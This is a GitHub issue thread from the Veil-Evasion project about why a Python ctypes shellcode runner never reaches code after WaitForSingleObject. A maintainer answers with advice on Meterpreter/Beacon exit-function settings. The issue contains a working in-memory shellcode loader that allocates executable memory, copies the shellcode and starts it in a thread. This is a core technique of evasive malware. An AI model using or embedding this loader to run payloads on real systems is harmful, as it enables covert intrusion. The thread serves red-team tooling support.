### ISSUE TITLE
How to execute something after WaitForSingleObject

### ISSUE THREAD

**Issue by kkar** [Veil-Framework/Veil-Evasion#440]
## Expected behavior - To execute the last line before exit, when the session ends (eg: sessions -K)

`ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(shellcode)),ctypes.c_int(0x3000),ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),buf,ctypes.c_int(len(shellcode)))
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(ptr),ctypes.c_int(0),ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))

**print "THIS LINE IS NEVER EXECUTED"**`

**Comment by ChrisTruncer** [comment]
That line won't hit until after Meterpreter/Beacon exits.  If using Meterpreter, you are going to need to change your ExitFunction.  I believe changing it to Thread instead of process will allow your process to continue on and execute commands after WaitForSingleObject.

With that said, I know your print statement might just be a debugging tool, but it won't print to the console due to the window being hidden for python scripts.

If you have additional questions, go for it, otherwise hope that helps.
